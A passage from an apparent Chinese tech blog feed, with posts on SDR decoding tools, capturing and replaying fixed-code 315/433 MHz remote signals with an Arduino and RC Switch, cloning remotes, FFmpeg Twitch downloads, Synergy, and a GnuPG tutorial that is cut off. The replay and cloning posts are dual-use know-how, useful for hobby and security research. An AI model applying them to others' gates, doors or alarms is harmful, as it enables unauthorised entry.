设备捕获的信号文件进行分析解码的工具。<br>inspectrum 配合 <a href="https://github.com/tresacton/dspectrum" target="_blank" rel="noopener">dspectrum</a> 使用,对信号解码会更方便。</p><p><img src="//files.iternull.com/images/2017-02-02_01-0004.png" alt=""></p><ul><li>注:Kali Linux 官方仓库里的版本太老了,安装上后会发现没有你想要的功能。请手动编译安装,如果编译出错请检查是否安装了 <code>libliquid-dev</code> 这个依赖包,或者根据错误提示解决问题。</li></ul><h3 id="5、WaveConverter"><a href="#5、WaveConverter" class="headerlink" title="5、WaveConverter"></a>5、WaveConverter</h3><p><a href="https://github.com/paulgclark/waveconverter" target="_blank" rel="noopener">WaveConverter</a> 是另一款专业的用于对来自 <a href="https://en.wikipedia.org/wiki/Software-defined_radio" target="_blank" rel="noopener">SDR</a> 设备信号的解码工具。</p><p><img src="//files.iternull.com/images/2017-02-02_01-0005.png" alt=""></p><h3 id="6、Audacity"><a href="#6、Audacity" class="headerlink" title="6、Audacity"></a>6、Audacity</h3><p><a href="http://www.audacityteam.org/" target="_blank" rel="noopener">Audacity</a> 是一款音频编辑软件。Audacity 也是对 <a href="https://en.wikipedia.org/wiki/Software-defined_radio" target="_blank" rel="noopener">SDR</a> 设备所采集的信号解码里的老牌工具,功能很强大,对捕获的 <a href="https://en.wikipedia.org/wiki/Impulse_response" target="_blank" rel="noopener">IR</a> 信号也能解码。不过使用麻烦,新手上手可能比较困难。</p><p><img src="//files.iternull.com/images/2017-02-02_01-0006.png" alt=""></p><hr><ul><li>注:以上列出来的只是常见的方法。</li></ul>]]></content>
<summary type="html">
<p>本文中的无线遥控器指的是以 <a href="https://en.wikipedia.org/wiki/On-off_keying" target="_blank" rel="noopener">OOK</a> 方式调制信号的无线遥控器,这是我们在生活中最常见的遥控器。<br>
</summary>
<category term="433 MHz" scheme="https://blog.iternull.com/tags/433-MHz/"/>
<category term="Decoding" scheme="https://blog.iternull.com/tags/Decoding/"/>
</entry>
<entry>
<title>使用 Arduino 和 RC Switch 逆向遥控器</title>
<link href="https://blog.iternull.com/posts/2017/01/29/Use-the-Arduino-and-RC-Switch-reverse-remote-controls.html"/>
<id>https://blog.iternull.com/posts/2017/01/29/Use-the-Arduino-and-RC-Switch-reverse-remote-controls.html</id>
<published>2017-01-29T09:07:41.000Z</published>
<updated>2017-02-11T06:01:31.175Z</updated>
<content type="html"><![CDATA[<p>我们平常对遥控器信号的截取、分析、重放,一般用得都是 SDR 设备,常见的有 R820T2+RTL2832U, CC1111EMK, Yardstick One, HackRF One ……<br>其中 R820T2+RTL2832U 电视棒是最廉价的 SDR 设备,35 人民币左右就能得到,其余的都是比较昂贵的设备。不过使用电视棒你只能接收信号,不能发送信号。</p><p>这里我们使用更廉价的设备(Arduino + 315 or 433 MHz 超再生模块)来实现对常见固定码遥控器信号的分析与重放。<br><a id="more"></a><br>常见型号的 Arduino 开发板都可以支持,无线模块建议不同频段的多买几对,价格也不贵。</p><h2 id="1、接收-解码信号"><a href="#1、接收-解码信号" class="headerlink" title="1、接收/解码信号"></a>1、接收/解码信号</h2><p>这里我们使用 <a href="https://github.com/sui77/rc-switch" target="_blank" rel="noopener">RC Switch</a> 库接收和解码信号。</p><h3 id="1-1-安装-RC-Switch-库"><a href="#1-1-安装-RC-Switch-库" class="headerlink" title="1.1 安装 RC Switch 库"></a>1.1 安装 RC Switch 库</h3><p>打开 Arduino IDE ,在选项栏 项目 > 加载库 > 管理库 里打开库管理器,搜索 <code>rc switch</code> 并安装它。</p><p><img src="//files.iternull.com/images/2017-01-29_01-0001.png" alt=""></p><h3 id="1-2-连接-Arduino-和接收模块"><a href="#1-2-连接-Arduino-和接收模块" class="headerlink" title="1.2 连接 Arduino 和接收模块"></a>1.2 连接 Arduino 和接收模块</h3><p><img src="//files.iternull.com/images/2017-01-29_01-0002.png" alt=""></p><p>使用数据线连接 Arduino 到电脑,并在 Arduino IDE 里选择对应的板和端口号。</p><p><img src="//files.iternull.com/images/2017-01-29_01-0003.png" alt=""></p><h3 id="1-3-上传代码"><a href="#1-3-上传代码" class="headerlink" title="1.3 上传代码"></a>1.3 上传代码</h3><p>打开信号接收的示例代码。在选项栏 文件 > 示例 > rc-switch > ReceiveDemo_Simple</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> Simple example for receiving</span></span><br><span class="line"><span class="comment"> </span></span><br><span class="line"><span class="comment"> https://github.com/sui77/rc-switch/</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><RCSwitch.h></span></span></span><br><span class="line"></span><br><span class="line">RCSwitch mySwitch = RCSwitch();</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">setup</span><span class="params">()</span> </span>{</span><br><span class="line"> Serial.begin(<span class="number">9600</span>);</span><br><span class="line"> mySwitch.enableReceive(<span class="number">0</span>); <span class="comment">// Receiver on interrupt 0 => that is pin #2</span></span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">loop</span><span class="params">()</span> </span>{</span><br><span class="line"> <span class="keyword">if</span> (mySwitch.available()) {</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">int</span> value = mySwitch.getReceivedValue();</span><br><span class="line"> </span><br><span class="line"> <span class="keyword">if</span> (value == <span class="number">0</span>) {</span><br><span class="line"> Serial.print(<span class="string">"Unknown encoding"</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> Serial.print(<span class="string">"Received "</span>);</span><br><span class="line"> Serial.print( mySwitch.getReceivedValue() );</span><br><span class="line"> Serial.print(<span class="string">" / "</span>);</span><br><span class="line"> Serial.print( mySwitch.getReceivedBitlength() );</span><br><span class="line"> Serial.print(<span class="string">"bit "</span>);</span><br><span class="line"> Serial.print(<span class="string">"Protocol: "</span>);</span><br><span class="line"> Serial.println( mySwitch.getReceivedProtocol() );</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> mySwitch.resetAvailable();</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>点击上传,上传代码到 Arduino</p><p><img src="//files.iternull.com/images/2017-01-29_01-0004.png" alt=""></p><p>想要注意的一点,在 <code>void setup()</code> 里有一行代码是定义数据接收的针脚的,不同的 Arduino 版本针脚不一样,如果接错线会导致 Arduino 没法正常工作,具体可以参考 Arduino 的文档。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">mySwitch.enableReceive(<span class="number">0</span>); <span class="comment">// Receiver on interrupt 0 => that is pin #2</span></span><br></pre></td></tr></table></figure><h3 id="1-4-查看信号解码"><a href="#1-4-查看信号解码" class="headerlink" title="1.4 查看信号解码"></a>1.4 查看信号解码</h3><p>打开串口监视器。在选项栏 工具 > 串口监视器 或者按快捷键 <code>Ctrl + Shift + M</code></p><p>然后你可以按下遥控器,Arduino 会解码它,并在串口监视器上显示出你按下的按键所发送的代码。</p><p><img src="//files.iternull.com/images/2017-01-29_01-0005.png" alt=""></p><h2 id="2、重放信号"><a href="#2、重放信号" class="headerlink" title="2、重放信号"></a>2、重放信号</h2><p>当你知道了信号的代码后你就可以对它进行信号的重放。</p><h3 id="2-1-连接-Arduino-和发送模块"><a href="#2-1-连接-Arduino-和发送模块" class="headerlink" title="2.1 连接 Arduino 和发送模块"></a>2.1 连接 Arduino 和发送模块</h3><p><img src="//files.iternull.com/images/2017-01-29_01-0006.png" alt=""></p><h3 id="2-2-修改示例代码"><a href="#2-2-修改示例代码" class="headerlink" title="2.2 修改示例代码"></a>2.2 修改示例代码</h3><p>打开信号发送的示例代码。在选项栏 文件 > 示例 > rc-switch > SendDemo</p><p>示例代码里有好几种发送选项,和好几个被注释的发送参数。</p><p>这里我们使用十进制的发送方式。</p><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"> Example for different sending methods</span></span><br><span class="line"><span class="comment"> </span></span><br><span class="line"><span class="comment"> https://github.com/sui77/rc-switch/</span></span><br><span class="line"><span class="comment"> </span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string"><RCSwitch.h></span></span></span><br><span class="line"></span><br><span class="line">RCSwitch mySwitch = RCSwitch();</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">setup</span><span class="params">()</span> </span>{</span><br><span class="line"></span><br><span class="line"> Serial.begin(<span class="number">9600</span>);</span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Transmitter is connected to Arduino Pin #10 </span></span><br><span class="line"> mySwitch.enableTransmit(<span class="number">10</span>);</span><br><span class="line"></span><br><span class="line"> <span class="comment">// Optional set pulse length.</span></span><br><span class="line"> <span class="comment">// mySwitch.setPulseLength(320);</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Optional set protocol (default is 1, will work for most outlets)</span></span><br><span class="line"> <span class="comment">// mySwitch.setProtocol(2);</span></span><br><span class="line"> </span><br><span class="line"> <span class="comment">// Optional set number of transmission repetitions.</span></span><br><span class="line"> <span class="comment">// mySwitch.setRepeatTransmit(15);</span></span><br><span class="line"> </span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">loop</span><span class="params">()</span> </span>{</span><br><span class="line"></span><br><span class="line"> <span class="comment">/* See Example: TypeA_WithDIPSwitches */</span></span><br><span class="line"> <span class="comment">/*</span></span><br><span class="line"><span class="comment"> mySwitch.switchOn("11111", "00010");</span></span><br><span class="line"><span class="comment"> delay(1000);</span></span><br><span class="line"><span class="comment"> mySwitch.switchOff("11111", "00010");</span></span><br><span class="line"><span class="comment"> delay(1000);</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">/* Same switch as above, but using decimal code */</span></span><br><span class="line"> mySwitch.send(<span class="number">5393</span>, <span class="number">24</span>); <span class="comment">// 5393 表示发送的信号代码, 24 表示数据长度。</span></span><br><span class="line"> delay(<span class="number">1000</span>); <span class="comment">// 暂停 1000 毫秒后再执行下一行代码。</span></span><br><span class="line"> mySwitch.send(<span class="number">5396</span>, <span class="number">24</span>);</span><br><span class="line"> delay(<span class="number">1000</span>); </span><br><span class="line"></span><br><span class="line"> <span class="comment">/* Same switch as above, but using binary code */</span></span><br><span class="line"> <span class="comment">/*</span></span><br><span class="line"><span class="comment"> mySwitch.send("000000000001010100010001");</span></span><br><span class="line"><span class="comment"> delay(1000); </span></span><br><span class="line"><span class="comment"> mySwitch.send("000000000001010100010100");</span></span><br><span class="line"><span class="comment"> delay(1000);</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"> <span class="comment">/* Same switch as above, but tri-state code */</span> </span><br><span class="line"> <span class="comment">/*</span></span><br><span class="line"><span class="comment"> mySwitch.sendTriState("00000FFF0F0F");</span></span><br><span class="line"><span class="comment"> delay(1000); </span></span><br><span class="line"><span class="comment"> mySwitch.sendTriState("00000FFF0FF0");</span></span><br><span class="line"><span class="comment"> delay(1000);</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"></span><br><span class="line"> delay(<span class="number">20000</span>);</span><br><span class="line">}</span><br></pre></td></tr></table></figure><h3 id="2-3-上传代码"><a href="#2-3-上传代码" class="headerlink" title="2.3 上传代码"></a>2.3 上传代码</h3><p><img src="//files.iternull.com/images/2017-01-29_01-0004.png" alt=""></p><p>代码上传完成后会一直向外发送信号。</p><h2 id="3、可能遇到的问题"><a href="#3、可能遇到的问题" class="headerlink" title="3、可能遇到的问题"></a>3、可能遇到的问题</h2><p>1、串口监视器没有显示,不能正常接收信号。</p><p>导致出现正在错误的情况有很多,比如打开的端口错误、接收模块与 Arduino 的连接错误、遥控器和接收模块不是同一个频段的……</p><p>2、发送的信号正常但被遥控的设备没响应。</p><p>遇到这种情况你需要使用 RC Switch 库的 ReceiveDemo_Advanced 示例代码进行接收和解码信号,其中有一个 <code>PulseLength</code> 字段,RC Switch 库默认的值是 <code>320</code>,而常见的遥控器是 <code>185</code> 你需要修改发送代码的 <code>mySwitch.setPulseLength(185);</code> 参数。</p><hr><ul><li>RC Switch: <a href="https://github.com/sui77/rc-switch" target="_blank" rel="noopener">https://github.com/sui77/rc-switch</a></li></ul>]]></content>
<summary type="html">
<p>我们平常对遥控器信号的截取、分析、重放,一般用得都是 SDR 设备,常见的有 R820T2+RTL2832U, CC1111EMK, Yardstick One, HackRF One ……<br>其中 R820T2+RTL2832U 电视棒是最廉价的 SDR 设备,35 人民币左右就能得到,其余的都是比较昂贵的设备。不过使用电视棒你只能接收信号,不能发送信号。</p>
<p>这里我们使用更廉价的设备(Arduino + 315 or 433 MHz 超再生模块)来实现对常见固定码遥控器信号的分析与重放。<br>
</summary>
<category term="433 MHz" scheme="https://blog.iternull.com/tags/433-MHz/"/>
<category term="315 MHz" scheme="https://blog.iternull.com/tags/315-MHz/"/>
<category term="Arduino" scheme="https://blog.iternull.com/tags/Arduino/"/>
<category term="RC Switch" scheme="https://blog.iternull.com/tags/RC-Switch/"/>
</entry>
<entry>
<title>对码与拨码遥控器的拷贝方法</title>
<link href="https://blog.iternull.com/posts/2017/01/11/Onthe-code-amd-dial-code-remote-control.html"/>
<id>https://blog.iternull.com/posts/2017/01/11/Onthe-code-amd-dial-code-remote-control.html</id>
<published>2017-01-11T07:05:18.000Z</published>
<updated>2017-02-11T05:59:54.032Z</updated>
<content type="html"><![CDATA[<p>对码遥控器是能自动学习另一个同频段的遥控器。拨码遥控器是带一个 3 态 8 位拨码开关的遥控器,使用时需要开盖拨动开关位。<br><a id="more"></a></p><h2 id="对码遥控器拷贝方法"><a href="#对码遥控器拷贝方法" class="headerlink" title="对码遥控器拷贝方法"></a>对码遥控器拷贝方法</h2><p><img src="//files.iternull.com/images/2017-01-11_02-0001.jpg" alt=""></p><h3 id="清码"><a href="#清码" class="headerlink" title="清码"></a>清码</h3><p>同时按下遥控器上排的两个按键,指示灯不停的闪动后,再松开您的手,即表示清除成功。<br>清除成功的辨别方法是随意按遥控器四个按键的一个,指示灯仅闪一下后熄灭。</p><h3 id="对拷"><a href="#对拷" class="headerlink" title="对拷"></a>对拷</h3><p>一个手拿着原来的遥控器一个手拿着拷贝遥控器,两个遥控器尽量靠近,同时按下两个遥控器开门键,<br>拷贝遥控器指示灯快速闪动即表示复制成功,再松开您的手。依次按相同方法,将其它三个按键拷贝上去。<br>(拷贝时候如果灯不闪动,可以换个位置,将两个遥控器的头部对着再拷贝试试。总之可以多换几个位置试试。)</p><h3 id="恢复"><a href="#恢复" class="headerlink" title="恢复"></a>恢复</h3><p>若误操作清除掉有用代码后(即可能不小心按了上面的两个键),<br>在没有重新拷贝其他遥控器之前可同时按下遥控器下排两个按键指示灯快速闪烁再松开手表示恢复完成了。</p><h2 id="拨码遥控器拷贝方法"><a href="#拨码遥控器拷贝方法" class="headerlink" title="拨码遥控器拷贝方法"></a>拨码遥控器拷贝方法</h2><p><img src="//files.iternull.com/images/2017-01-11_02-0002.jpg" alt=""></p><h3 id="对应码表拨码"><a href="#对应码表拨码" class="headerlink" title="对应码表拨码"></a>对应码表拨码</h3><p><img src="//files.iternull.com/images/2017-01-11_02-0003.png" alt=""></p><h3 id="对应焊点拨码"><a href="#对应焊点拨码" class="headerlink" title="对应焊点拨码"></a>对应焊点拨码</h3><p><img src="//files.iternull.com/images/2017-01-11_02-0004.jpg" alt=""></p><p>如果遥控器上没有拨码表,也没有焊点那这可能是一个学习码的遥控器,一般在被控制端会有个学习键。<br>在适配遥控器时还要注意区分工作频段,通常在主板晶振上会有对应的数字如:433、315 什么的那就是这个遥控器对应的频段。<br>不同频段的遥控器是没反通用的,还有一个判断方法是拿一个以知频段的遥控器一种发出信号看是否会产生干扰,<br>如果会这说明这两个遥控器是在同一频段的,这方法不一定总是有效。</p><hr><ul><li><a href="http://jingyan.baidu.com/article/6b97984db4c0961ca2b0bf15.html" target="_blank" rel="noopener">http://jingyan.baidu.com/article/6b97984db4c0961ca2b0bf15.html</a></li></ul>]]></content>
<summary type="html">
<p>对码遥控器是能自动学习另一个同频段的遥控器。拨码遥控器是带一个 3 态 8 位拨码开关的遥控器,使用时需要开盖拨动开关位。<br>
</summary>
<category term="433 MHz" scheme="https://blog.iternull.com/tags/433-MHz/"/>
</entry>
<entry>
<title>使用 FFmpeg 下载 Twitch 视频</title>
<link href="https://blog.iternull.com/posts/2017/01/11/FFmpeg-Download-Twitch-Video.html"/>
<id>https://blog.iternull.com/posts/2017/01/11/FFmpeg-Download-Twitch-Video.html</id>
<published>2017-01-11T06:25:17.000Z</published>
<updated>2017-02-11T05:58:22.476Z</updated>
<content type="html"><![CDATA[<p>Twitch 是一个视频网站,使用的是流媒体播放技术。我之前使用另一种方法来使用迅雷下载视频,不过网站好像升级了方法失效了。<br>这里介绍使用 FFmpeg 的下载的方法。<br><a id="more"></a><br>使用流媒体播放技术会先获取一个 M3U8 格式的文件,M3U8 是包含多媒体播放列表的计算机文件格式,M3U8 文件指定一个或多个媒体文件的位置,而不是视频本身。</p><p>打开浏览器调试功能或者称作开发者功能,这以 Chrome 为例。</p><p>先按 <code>F12</code> 打开浏览器开发者功能,再浏览器里打开一个 Twitch 的<a href="https://www.twitch.tv/reddit/v/113771480" target="_blank" rel="noopener">视频</a>页面。</p><p>点击开发者工具的 Network 功能,在过滤器输入框内输入 <code>m3u8</code>,然后你就会看到几个以 <code>.m3u8</code> 后缀命名的文件,没有的话刷新一下页面。<br>我们需要的是一个以当前视频 ID 命名的 <code>.m3u8</code> 文件。在那个文件上右键 <code>Open link in new tab</code> 会打开一个新窗口,直接下载这个文件。</p><p><img src="//files.iternull.com/images/2017-01-11_01-0001.png" alt=""></p><p>打开文件会看到如下内容:</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">#EXTM3U</span><br><span class="line">#EXT-X-TWITCH-INFO:ORIGIN="swift",CLUSTER="akamai_vod",REGION="AS",MANIFEST-CLUSTER="akamai_vod",USER-IP="*.*.*.*"</span><br><span class="line">#EXT-X-MEDIA:TYPE=VIDEO,GROUP-ID="chunked",NAME="Source",AUTOSELECT=YES,DEFAULT=YES</span><br><span class="line">#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=2224881,CODECS="avc1.64001F,mp4a.40.2",RESOLUTION="960x540",VIDEO="chunked"</span><br><span class="line">https://vod120-ttvnw.akamaized.net/v1/AUTH_system/vods_986f/reddit_24198780160_581094262/chunked/index-dvr.m3u8</span><br><span class="line">#EXT-X-MEDIA:TYPE=VIDEO,GROUP-ID="high",NAME="High",AUTOSELECT=YES,DEFAULT=YES</span><br><span class="line">#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=1860187,CODECS="avc1.000000,mp4a.40.2",RESOLUTION="0x0",VIDEO="high"</span><br><span class="line">https://vod120-ttvnw.akamaized.net/v1/AUTH_system/vods_986f/reddit_24198780160_581094262/high/index-dvr.m3u8</span><br><span class="line">#EXT-X-MEDIA:TYPE=VIDEO,GROUP-ID="medium",NAME="Medium",AUTOSELECT=YES,DEFAULT=YES</span><br><span class="line">#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=1042492,CODECS="avc1.000000,mp4a.40.2",RESOLUTION="0x0",VIDEO="medium"</span><br><span class="line">https://vod120-ttvnw.akamaized.net/v1/AUTH_system/vods_986f/reddit_24198780160_581094262/medium/index-dvr.m3u8</span><br><span class="line">#EXT-X-MEDIA:TYPE=VIDEO,GROUP-ID="low",NAME="Low",AUTOSELECT=YES,DEFAULT=YES</span><br><span class="line">#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=733910,CODECS="avc1.000000,mp4a.40.2",RESOLUTION="0x0",VIDEO="low"</span><br><span class="line">https://vod120-ttvnw.akamaized.net/v1/AUTH_system/vods_986f/reddit_24198780160_581094262/low/index-dvr.m3u8</span><br><span class="line">#EXT-X-MEDIA:TYPE=VIDEO,GROUP-ID="mobile",NAME="Mobile",AUTOSELECT=YES,DEFAULT=YES</span><br><span class="line">#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=324657,CODECS="avc1.000000,mp4a.40.2",RESOLUTION="0x0",VIDEO="mobile"</span><br><span class="line">https://vod120-ttvnw.akamaized.net/v1/AUTH_system/vods_986f/reddit_24198780160_581094262/mobile/index-dvr.m3u8</span><br></pre></td></tr></table></figure><p>我们一般使用 <code>chunked</code> 的链接。<br>复制你选择的链接,使用 FFmpeg 下载并转码他。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./ffmpeg -i "https://vod120-ttvnw.akamaized.net/v1/AUTH_system/vods_986f/reddit_24198780160_581094262/chunked/index-dvr.m3u8" -c copy -bsf:a aac_adtstoasc file_name.mkv</span><br></pre></td></tr></table></figure><p><code>file_name.mkv</code> 是你的文件名,如果不报错就会完整的下载整段视频。</p>]]></content>
<summary type="html">
<p>Twitch 是一个视频网站,使用的是流媒体播放技术。我之前使用另一种方法来使用迅雷下载视频,不过网站好像升级了方法失效了。<br>这里介绍使用 FFmpeg 的下载的方法。<br>
</summary>
<category term="FFmpeg" scheme="https://blog.iternull.com/tags/FFmpeg/"/>
<category term="Twitch" scheme="https://blog.iternull.com/tags/Twitch/"/>
</entry>
<entry>
<title>Synergy 使用简介</title>
<link href="https://blog.iternull.com/posts/2016/08/05/Synergy-Introduction.html"/>
<id>https://blog.iternull.com/posts/2016/08/05/Synergy-Introduction.html</id>
<published>2016-08-05T05:59:51.000Z</published>
<updated>2017-02-11T06:00:56.742Z</updated>
<content type="html"><![CDATA[<p>Synergy 是一款可以让你的多台电脑共享一套键盘和鼠标的工具,并且支持共享剪贴板。<br>Synergy 是款跨平台的开源软件有收费版与免费版,支持 Win/Mac/Linux 可以有效提高工作效率。<br><a id="more"></a></p><h2 id="1、下载"><a href="#1、下载" class="headerlink" title="1、下载"></a>1、下载</h2><p>Synergy 曾经是完全免费的,现在官方推荐你购买付费版本,不过也放出了免费版本。<br>Synergy 官网:<a href="http://symless.com/synergy/" target="_blank" rel="noopener">http://symless.com/synergy/</a><br>Synergy 免费版本下载:<a href="http://symless.com/download/free/" target="_blank" rel="noopener">http://symless.com/download/free/</a></p><h2 id="2、配置"><a href="#2、配置" class="headerlink" title="2、配置"></a>2、配置</h2><p>使用 Synergy 只是需要 2 台电脑,插了要共享出去的键盘和鼠标的电脑作为服务端,其他的电脑作为客户端。</p><h3 id="服务端配置"><a href="#服务端配置" class="headerlink" title="服务端配置"></a>服务端配置</h3><p><img src="//files.iternull.com/images/2016-08-05_01-0001.png" alt=""></p><p>勾选为服务端模式,选择自己配置服务端设置,点击 <code>Configure Server</code> 会弹出服务端的配置界面。</p><p><img src="//files.iternull.com/images/2016-08-05_01-0002.png" alt=""></p><p>配置界面默认只有本机的配置图标,需要手动添加其他电脑进来。</p><p>例如在本机的右侧有一台 Windows 笔记本,点击右上角的电脑图标拖动到本机图标的右侧(位置请根据显示屏的物理定义,否则鼠标移动会非常别扭)。</p><p>双击新拖进来的图标打开窗口设置界面,在 <code>Screen name</code> 输入框里填入要添加电脑的主机名(主机名必须与那台主机的主机名一样),点击 <code>OK</code> 保存退出。<br>要删除某台客户端电脑直接拖动图标到左上角的垃圾桶即可。<br>添加完主机后点击 <code>OK</code> 保存退出。</p><p>保存配置文件到本地<br>点击 <code>File</code> 选项下的 <code>Save configure</code> 保存到自己指定的目录里,或者按快捷键 <code>Ctrl + Alt + S</code> 保存。<br>点击右下角 <code>Start</code> 启动 Synergy 服务。</p><p><img src="//files.iternull.com/images/2016-08-05_01-0003.png" alt=""></p><p>Synergy 窗口界面可以关闭,Synergy 会自动在后台运行,如果要退出 Synergy 点击 <code>File</code> 选项下的 <code>Quit</code> 即可退出。</p><h3 id="客户端配置"><a href="#客户端配置" class="headerlink" title="客户端配置"></a>客户端配置</h3><p><img src="//files.iternull.com/images/2016-08-05_01-0004.png" alt=""></p><p>勾选为客户端模式,在 <code>Server IP</code> 输入框里填入服务端的 <code>IP</code> ,点击右下角 <code>Start</code> 启动 Synergy 服务,链接到服务端。</p><h2 id="3、使用"><a href="#3、使用" class="headerlink" title="3、使用"></a>3、使用</h2><p>配置完成后,并且无报错即可正常使用了。<br>移动鼠标到超出本机的右侧边界即可移动到右侧另一台电脑的屏幕上,键盘也自动会切换过去。</p><p>其余更多功能请自行摸索。</p><hr><ul><li>Synergy Wiki: <a href="https://github.com/symless/synergy/wiki" target="_blank" rel="noopener">https://github.com/symless/synergy/wiki</a></li></ul>]]></content>
<summary type="html">
<p>Synergy 是一款可以让你的多台电脑共享一套键盘和鼠标的工具,并且支持共享剪贴板。<br>Synergy 是款跨平台的开源软件有收费版与免费版,支持 Win/Mac/Linux 可以有效提高工作效率。<br>
</summary>
<category term="Synergy" scheme="https://blog.iternull.com/tags/Synergy/"/>
<category term="Keyborad" scheme="https://blog.iternull.com/tags/Keyborad/"/>
<category term="Mouse" scheme="https://blog.iternull.com/tags/Mouse/"/>
</entry>
<entry>
<title>GnuPG 入门教程</title>
<link href="https://blog.iternull.com/posts/2016/07/16/GPG-Getting-Started-Tutorial.html"/>
<id>https://blog.iternull.com/posts/2016/07/16/GPG-Getting-Started-Tutorial.html</id>
<published>2016-07-16T02:26:33.000Z</published>
<updated>2017-06-09T21:03:13.757Z</updated>
<content type="html"><![CDATA[<p>GnuPG (GNU Privacy Guard,GPG) 是一种加密软件,它是 PGP 加密软件的满足 GPL 协议的替代物。GnuPG 依照由 IETF 制定的 OpenPGP 技术标准设计。GnuPG 是用于加密、数字签章及产生非对称匙对的软件。GPG 兼容 PGP (Pretty Good Privacy) 的功能。<br><a id="more"></a></p><h2 id="1、安装"><a href="#1、安装" class="headerlink" title="1、安装"></a>1、安装</h2><ul><li>Debian / Ubuntu</li></ul><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install gnupg</span><br></pre></td></tr></table></figure><ul><li>CentOS / Fedora</li></ul><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">yum install gnupg</span><br></pre></td></tr></table></figure><h2 id="2、第一次使用"><a href="#2、第一次使用" class="headerlink" title="2、第一次使用"></a>2、第一次使用</h2><p>首先你要有一对自己的密钥,才能开始使用。</p><h3 id="2-1、生成密钥对"><a href="#2-1、生成密钥对" class="headerlink" title="2.1、生成密钥对"></a>2.1、生成密钥对</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --gen-key</span><br></pre></td></tr></table></figure><p>回车以后,会跳出一大段文字:<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span 